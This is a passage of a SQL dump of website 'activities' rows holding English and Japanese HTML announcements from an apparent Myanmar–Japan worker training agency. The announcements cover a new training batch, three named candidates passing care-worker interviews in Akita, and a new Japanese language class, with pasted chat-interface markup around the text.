4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\"><div class=\"relative h-full w-full\"><div class=\"flex flex-col gap-3.5 pb-3.5 pt-2\"><div class=\"flex w-full items-start gap-4 rounded-2xl border border-token-border-light bg-token-main-surface-primary py-4 pl-5 pr-3 text-sm text-token-text-primary [text-wrap:pretty] dark:border-transparent dark:bg-token-main-surface-secondary md:items-center lg:mx-auto shadow-xxs\"><div class=\"mt-1.5 flex grow flex-col items-start gap-4 md:mt-0 md:flex-row md:items-center md:justify-between md:gap-8\"><div class=\"flex max-w-md flex-col\"><div class=\"\">&nbsp;</div></div></div></div></div></div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 140, 579, 'en', 0, '<blockquote><h2>1st Batch Theoretical Class For 15 Students</h2></blockquote><div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-11\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"7ccdedbb-c0ce-4970-8404-33a9702e7c83\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p>Congratulations to all the children who have successfully passed the restaurant interview! In the new year, practical training will commence for 15 children based on the principles of success. Your hard work has paid off, and we commend your achievements. As you prepare to embark on this journey, we encourage you to continue your dedication. The classes are designed to equip you with essential workplace skills, so attendance is crucial. We look forward to seeing your continued progress and success in Japan.</p><img data-entity-uuid=\"652fd1b8-ec3f-4136-abb6-6af35c9c5874\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-45c4e9e998df6671bd77e672d9292fbee765ea62536ec837a00765efce79fc7e_c1fdb88868297dba.jpg\"><img data-entity-uuid=\"84103d30-1c8c-4a95-a703-5391e41d952d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-51ec7f4be81257f4ff2f721c5e084cb4cc382b2ec8cfcecae01d41a9e7c09e03_4b7c3a49166d492a.jpg\"><img data-entity-uuid=\"ea362f9f-07a8-43d7-904b-2d6cd4a8153b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-69d282081f3119be288d94bc0b4bb61ad1f17e8eaed3c08ca009c6a4de5dc75d_1383d6ddf8fe814d.jpg\"><img data-entity-uuid=\"177fde09-e74e-4cdf-80b2-3256275746b5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-724f082ab41be8e90d111399939af2f3d1a97e05877c69bff3284b02b5e1e4dd_5a389926988927bf.jpg\"><img data-entity-uuid=\"e394765a-6b85-4041-b003-780d2cdd58df\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-8033bc061c22ecda23a89cf99e7992d6788c3646c3972cfa22bcb78eddde2fd6_fc06ba5dae001c97.jpg\"><img data-entity-uuid=\"4404215d-4446-4952-b7fa-5cfe1f9d033b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-dad82938c3dc5bcbb853785ca4f388b1d3b1e5037a480a3ae260f8f6dee0ccea_42f956a550769234.jpg\"><img data-entity-uuid=\"23e3cb3a-b366-49e5-9456-59fe851e2a7e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-e6873cecbff4a19760cd209a7c4637d87ccaa857f5e00cf4acc717ab93afbe9f_fdb5e83019029c3c.jpg\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\"><div class=\"relative h-full w-full\"><div class=\"flex flex-col gap-3.5 pb-3.5 pt-2\"><div class=\"flex w-full items-start gap-4 rounded-2xl border border-token-border-light bg-token-main-surface-primary py-4 pl-5 pr-3 text-sm text-token-text-primary [text-wrap:pretty] dark:border-transparent dark:bg-token-main-surface-secondary md:items-center lg:mx-auto shadow-xxs\"><div class=\"mt-1.5 flex grow flex-col items-start gap-4 md:mt-0 md:flex-row md:items-center md:justify-between md:gap-8\"><div class=\"flex max-w-md flex-col\"><div class=\"\">&nbsp;</div></div></div></div></div></div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 140, 579, 'ja', 0, '<div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-11\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"7ccdedbb-c0ce-4970-8404-33a9702e7c83\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><blockquote><h2>15 名の生徒を対象とした第 1 バッチ理論クラス</h2></blockquote><p>レストラン面接に合格したすべての生徒の皆さん、おめでとうございます。新年には、成功の原則に基づいた 15 名の生徒を対象とした実習が始まります。皆さんの努力は報われ、私たちは皆さんの成果を称賛します。この旅に出発する準備をしながら、献身的な姿勢を続けてください。クラスは、職場で必須のスキルを身に付けるように設計されているため、出席は非常に重要です。日本での皆さんの継続的な進歩と成功を期待しています。</p><img src=\"/sites/default/files/inline-images/0-02-01-45c4e9e998df6671bd77e672d9292fbee765ea62536ec837a00765efce79fc7e_c1fdb88868297dba.jpg\" data-entity-uuid=\"652fd1b8-ec3f-4136-abb6-6af35c9c5874\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-51ec7f4be81257f4ff2f721c5e084cb4cc382b2ec8cfcecae01d41a9e7c09e03_4b7c3a49166d492a.jpg\" data-entity-uuid=\"84103d30-1c8c-4a95-a703-5391e41d952d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-69d282081f3119be288d94bc0b4bb61ad1f17e8eaed3c08ca009c6a4de5dc75d_1383d6ddf8fe814d.jpg\" data-entity-uuid=\"ea362f9f-07a8-43d7-904b-2d6cd4a8153b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-724f082ab41be8e90d111399939af2f3d1a97e05877c69bff3284b02b5e1e4dd_5a389926988927bf.jpg\" data-entity-uuid=\"177fde09-e74e-4cdf-80b2-3256275746b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-8033bc061c22ecda23a89cf99e7992d6788c3646c3972cfa22bcb78eddde2fd6_fc06ba5dae001c97.jpg\" data-entity-uuid=\"e394765a-6b85-4041-b003-780d2cdd58df\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dad82938c3dc5bcbb853785ca4f388b1d3b1e5037a480a3ae260f8f6dee0ccea_42f956a550769234.jpg\" data-entity-uuid=\"4404215d-4446-4952-b7fa-5cfe1f9d033b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e6873cecbff4a19760cd209a7c4637d87ccaa857f5e00cf4acc717ab93afbe9f_fdb5e83019029c3c.jpg\" data-entity-uuid=\"23e3cb3a-b366-49e5-9456-59fe851e2a7e\" data-entity-type=\"file\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\"><div class=\"relative h-full w-full\"><div class=\"flex flex-col gap-3.5 pb-3.5 pt-2\"><div class=\"flex w-full items-start gap-4 rounded-2xl border border-token-border-light bg-token-main-surface-primary py-4 pl-5 pr-3 text-sm text-token-text-primary [text-wrap:pretty] dark:border-transparent dark:bg-token-main-surface-secondary md:items-center lg:mx-auto shadow-xxs\"><div class=\"mt-1.5 flex grow flex-col items-start gap-4 md:mt-0 md:flex-row md:items-center md:justify-between md:gap-8\"><div class=\"flex max-w-md flex-col\"><div class=\"\">&nbsp;</div></div></div></div></div></div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 141, 580, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations to EI EI NYEIN, THU ZAR AUNG, BUE MYAR SHAR for passing the Interview for TOKUTEI KAIGO at AKITA Prefecture in JAPAN!&nbsp;</p><img src=\"/sites/default/files/inline-images/BUE%20MYAR%20SHAR.jpg\" data-entity-uuid=\"f4e35c2e-f7b7-41d2-9c61-bc7879ffaa88\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/EI%20EI%20NYEIN_0.jpg\" data-entity-uuid=\"3488084a-8efc-4296-9e51-bf1c9f6c70e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THU%20ZAR%20AUNG.jpg\" data-entity-uuid=\"ba20b099-3864-49d5-b059-9e96580d768a\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 141, 581, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations to EI EI NYEIN, THU ZAR AUNG, BUE MYAR SHAR for passing the Interview for TOKUTEI KAIGO at AKITA Prefecture in JAPAN!&nbsp;</p><img src=\"/sites/default/files/inline-images/BUE%20MYAR%20SHAR.jpg\" data-entity-uuid=\"f4e35c2e-f7b7-41d2-9c61-bc7879ffaa88\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/EI%20EI%20NYEIN_0.jpg\" data-entity-uuid=\"3488084a-8efc-4296-9e51-bf1c9f6c70e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THU%20ZAR%20AUNG.jpg\" data-entity-uuid=\"ba20b099-3864-49d5-b059-9e96580d768a\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 141, 581, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>EI EI NYEINさん</strong>、<strong>THU ZAR AUNGさん</strong>、BUE MYAR SHARさんが秋田県の特定介護の面接に合格しました、おめでとうございます!</p><img src=\"/sites/default/files/inline-images/BUE%20MYAR%20SHAR.jpg\" data-entity-uuid=\"f4e35c2e-f7b7-41d2-9c61-bc7879ffaa88\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/EI%20EI%20NYEIN_0.jpg\" data-entity-uuid=\"3488084a-8efc-4296-9e51-bf1c9f6c70e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THU%20ZAR%20AUNG.jpg\" data-entity-uuid=\"ba20b099-3864-49d5-b059-9e96580d768a\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 142, 582, 'en', 0, '<blockquote><h2>Commencement Of New Comet Language Centre</h2></blockquote><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-13\" data-scroll-anchor=\"false\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"409c4610-442f-4274-9140-054f09750c0a\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p>The new year has begun with the introduction of a new N5 class, who are already preparing for the July N4 exam. Classes will be held daily, with regular assessments. From Monday to Thursday, one lesson will be conducted each day, and over the weekend (Friday to Sunday), we plan to reinforce learning through PopQuiz sessions to keep students engaged and avoid monotony in homework.As the school is affiliated with our agency, completing the course eliminates the need for students to seek interviews independently. Current Gaishoku candidates are equipped with essential knowledge through practical instruction by our teachers before their arrival in Japan.Students are responsible for adhering to their daily study routines, while we oversee the curriculum and facilitate their transition to Japan.</p><img src=\"/sites/default/files/inline-images/0-02-01-0d82578e4eeb95d45b3aea58a31107f4e9c7d0d57db6f2e0574c644b16cd5938_e03eefd818751014.jpg\" data-entity-uuid=\"f5371587-116f-4dac-879a-34801cef5949\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1f139d1e488c49efedfad0063e5adb305fab7ea9b3724aead3dd0aa73bbea6a3_af144a595daab05e.jpg\" data-entity-uuid=\"5c9a38b1-b151-4d2a-85ae-638b9f1bd956\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-4db89c7fb62a68759df9f4c1c421f10a418b7580ebe4baa7cd98a002d77c999e_d43d0c99d892dd0d.jpg\" data-entity-uuid=\"924820ef-7e98-4c7d-9106-32fae2827884\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-9aa16490a0b9226fe9b699d6c68553737d2095b7aed085bde1f659dbef90491b_a4dd5e0651b48b68.jpg\" data-entity-uuid=\"3836ec4e-123f-431b-8b58-96e7f9419c3d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-90fa91b1bec3ee89f057af76501a016c3ab6ec0c82a9774b2f3bc99ee300f8bf_56859cbe57067f4a.jpg\" data-entity-uuid=\"8bb4a31e-57a7-4a68-adbc-d48eb54b3c39\" data-entity-type=\"file\"><p>&nbsp;</p></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div></div></div></div></div></div><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-14\" data-scroll-anchor=\"false\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"flex-shrink-0 flex flex-col relative items-end\"><div><div class=\"pt-0.5 juice:pt-0\"><div class=\"gizmo-shadow-stroke flex h-6 w-6 items-center justify-center overflow-hidden rounded-full juice:h-8 juice:w-8\"><div class=\"overflow-hidden rounded-full\"><div class=\"relative flex items-center justify-center bg-blue-300 text-white h-full w-full text-xs\"><svg class=\"icon-sm\" xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M12 4a3 3 0 1 0 0 6 3 3 0 0 0 0-6M7 7a5 5 0 1 1 10 0A5 5 0 0 1 7 7m5 8c-3.656 0-6.5 2.75-6.5 6a1 1 0 1 1-2 0c0-4.482 3.872-8 8.5-8s8.5 3.518 8.5 8a1 1 0 1 1-2 0c0-3.25-2.844-6-6.5-6\" clip-rule=\"evenodd\"></path></svg></div><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"user\" data-message-id=\"aaa2496d-8022-456b-a68f-9edc75f88c0f\" dir=\"auto\"><div class=\"relative max-w-[70%]\"><div>&nbsp;</div></div></div></div></div></div></div></div></div></div></div></div></div>', '', 'full_html'),
('activities', 0, 142, 583, 'en', 0, '<blockquote><h2>Commencement Of New Comet Language Centre</h2></blockquote><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-13\" data-scroll-anchor=\"false\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"409c4610-442f-4274-9140-054f09750c0a\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p>The new year has begun with the introduction of a new N5 class, who are already preparing for the July N4 exam. Classes will be held daily, with regular assessments. From Monday to Thursday, one lesson will be conducted each day, and over the weekend (Friday to Sunday), we plan to reinforce learning through PopQuiz sessions to keep students engaged and avoid monotony in homework.As the school is affiliated with our agency, completing the course eliminates the need for students to seek interviews independently. Current Gaishoku candidates are equipped with essential knowledge through practical instruction by our teachers before their arrival in Japan.Students are responsible for adhering to their daily study routines, while we oversee the curriculum and facilitate their transition to Japan.</p><img src=\"/sites/default/files/inline-images/0-02-01-0d82578e4eeb95d45b3aea58a31107f4e9c7d0d57db6f2e0574c644b16cd5938_e03eefd818751014.jpg\" data-entity-uuid=\"f5371587-116f-4dac-879a-34801cef5949\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1f139d1e488c49efedfad0063e5adb305fab7ea9b3724aead3dd0aa73bbea6a3_af144a595daab05e.jpg\" data-entity-uuid=\"5c9a38b1-b151-4d2a-85ae-638b9f1bd956\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-4db89c7fb62a68759df9f4c1c421f10a418b7580ebe4baa7cd98a002d77c999e_d43d0c99d892dd0d.jpg\" data-entity-uuid=\"924820ef-7e98-4c7d-9106-32fae2827884\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-9aa16490a0b9226fe9b699d6c68553737d2095b7aed085bde1f659dbef90491b_a4dd5e0651b48b68.jpg\" data-entity-uuid=\"3836ec4e-123f-431b-8b58-96e7f9419c3d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-90fa91b1bec3ee89f057af76501a016c3ab6ec0c82a9774b2f3bc99ee300f8bf_56859cbe57067f4a.jpg\" data-entity-uuid=\"8bb4a31e-57a7-4a68-adbc-d48eb54b3c39\" data-entity-type=\"file\"><p>&nbsp;</p></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div></div></div></div></div></div><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-14\" data-scroll-anchor=\"false\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"flex-shrink-0 flex flex-col relative items-end\"><div><div class=\"pt-0.5 juice:pt-0\"><div class=\"gizmo-shadow-stroke flex h-6 w-6 items-center justify-center overflow-hidden rounded-full juice:h-8 juice:w-8\"><div class=\"overflow-hidden rounded-full\"><div class=\"relative flex items-center justify-center bg-blue-300 text-white h-full w-full text-xs\"><svg class=\"icon-sm\" xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M12 4a3 3 0 1 0 0 6 3 3 0 0 0 0-6M7 7a5 5 0 1 1 10 0A5 5 0 0 1 7 7m5 8c-3.656 0-6.5 2.75-6.5 6a1 1 0 1 1-2 0c0-4.482 3.872-8 8.5-8s8.5 3.518 8.5 8a1 1 0 1 1-2 0c0-3.25-2.844-6-6.5-6\" clip-rule=\"evenodd\"></path></svg></div><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"user\" 